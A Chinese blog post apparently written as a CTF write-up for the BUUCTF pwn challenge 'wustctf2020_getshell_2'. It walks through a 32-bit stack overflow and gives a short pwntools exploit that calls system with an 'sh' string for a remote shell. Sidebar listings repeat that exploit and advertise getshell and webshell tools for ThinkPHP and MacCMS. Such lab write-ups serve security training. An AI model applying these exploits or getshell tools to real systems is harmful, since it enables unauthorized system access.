wustctf2020_getshell_2

最新推荐文章于 2023-11-14 19:43:03 发布
最新推荐文章于 2023-11-14 19:43:03 发布
阅读量115 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/128681744
版权

wustctf2020_getshell_2

惯例先checksec一下
在这里插入图片描述

一个开启了nx保护的32位程序 放进ida里看看 main函数没啥信息 跳转到vulnerable函数看看

在这里插入图片描述

vulnable函数存在一个十分明显的栈溢出漏洞 但是只能溢出0xc的内容

在这里插入图片描述

shift+f12打开字符串表 没找到/bin/sh 但在shell函数处找到了system函数
请添加图片描述
利用ROPgadget找到sh的地址
在这里插入图片描述

请添加图片描述

exp:

from pwn import *
io=remote('node4.buuoj.cn',25465)
system=0x8048529
sh=0x8048670
io.recv()
payload='a'*(0x18+4)+p32(system)+p32(sh)
io.sendline(payload)
io.interactive()
爱若 AI_ruo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf wustctf2020_getshell_2 ret2shellcode
weixin_45441024的博客
12-01 613
BUUCTF wustctf2020_getshell_2 check一下,32位的程序且没有开任何保护 用ida打开,vuln很明显这是一个漏洞函数,f5查看一下伪代码,可以看到buf距离栈底0x18个字节 这是shell函数的伪代码,我们可以看到虽然这个并不是我们想要的shell(不是/bin/sh),但是程序里面有sh的字符串可以供我们利用,那我们现在就查找一下"sh"所在的位置 $ ROPgadget --binary '/home/pwn/Desktop/wustctf2020_getshe
ThinkPHP_getshell-v2.zip
11-11
验证think PHP5版本漏洞并可以getshell
[buuctf]wustctf2020_getshell_2
逆向萌新的博客
07-03 285
[buuctf]wustctf2020_getshell_2
SQL Server阻止了对组件xp_cmdshell过程的解决方案.docx
06-23
SQL Server阻止了对组件xp_cmdshell过程的解决方案。 错误描述:SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过...
Maccms8RceBypass_horsen9f_getshell_MacCMSgetshell_菜刀工具mac_eateni
09-11
Mac8.0的一款getshell工具 直接传一句话 用菜刀连就行了
shell_config.rar_Linux shell_parsing shell_shell config_get_sh
09-19
shell脚本解析配置文件获取变量参数
工具源码.zip_c段查询_getshell_漏洞扫描_爆破_端口爆破
07-13
工具功能 1:漏洞扫描 2::0day测试 3:cms漏洞扫描 4:旁注c段查询 ...9:Getshell自动 10:穷举爆破 11:漏洞爬行 12:安全文章对接推送 13:Struts2-045 -016 测试 14:信息收集 15:MD5解密 16:端口扫描
BUUCTF pwn——wustctf2020_getshell_2
CNS-Enterprise BCC-1701-J
05-23 101
BUUCTF 做题练习
[BUUCTF-pwn]——wustctf2020_getshell_2
Y_peak的博客
03-19 392
[BUUCTF-pwn]——wustctf2020_getshell_2 有system没有sh。所以找一下 exploit from pwn import * p = remote('node3.buuoj.cn',25464) sh = 0x08048670 payload = 'a' * (0x18 + 4) + p32(0x08048529) + p32(sh) p.sendline(payload) p.interactive()
[buuctf]wustctf2020_getshell
逆向萌新的博客
07-02 604
[buuctf]wustctf2020_getshell
[BUUCTF]PWN——wustctf2020_getshell1/2
mcmuyanga的博客
11-11 1136
wustctf2020_getshell 附件 步骤: 例行检查,32位程序,开启了NX保护 本地试运行一下程序,看看大概的情况 32位ida载入,习惯性的检索程序里的字符串,发现了后门函数 shell_addr=0x804851B main函数开始看程序 vulnerable函数 buf参数存在溢出漏洞,正好溢出8位,让我们覆盖到ret exp: from pwn import* r=remote('node3.buuoj.cn',29690) shell_addr=0x804851B
wustctf2020_getshell
z1r0的博客
12-10 386
wustctf2020_getshell 查看保护 有溢出,有后门,溢出长度足够,ret2text。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 29820) else: r = process(file_name) elf = ELF(file_
[BUUCTF-pwn]——wustctf2020_getshell
Y_peak的博客
03-16 160
[BUUCTF-pwn]——wustctf2020_getshell 额,太简单了直接上exploit吧 直接利用栈溢出,修改返回地址就好 from pwn import * p = remote('node3.buuoj.cn',28241) payload = 'a' * (0x18+4) + p32(0x0804851B) p.send(payload) p.interactive()
[WUSTCTF 2020]getshell
最新发布
沈理大学牲的博客
11-14 114
发现后门函数 shell,并且在vuin函数存在栈溢出。file 和checksec 检查文件。一道简单的ret2text。
[BUUCTF]PWN——wustctf2020_getshell
BangSen1的博客
03-30 254
wustctf2020_getshell 例行检查 ,开启NX保护,32位, 运行一下,打印出一个图形。 用IDA打开。看到了关键函数。 shelladdr=0x804851B 查看主函数,buf的长度为0x18,读取的长度为0x20,可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',28128) shelladdr=0x804851B payload='a'*(0x18+4)+p32(shelladdr) r.sendline(payl
hadoop_getshell
09-05
hadoop_getshell指的是利用Hadoop漏洞获取系统shell权限。Hadoop是一个开放源代码的分布式存储和计算框架,被广泛应用于大数据处理。但是,由于Hadoop的复杂性和开放性,可能存在各种漏洞和安全风险。 Hadoop_get...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值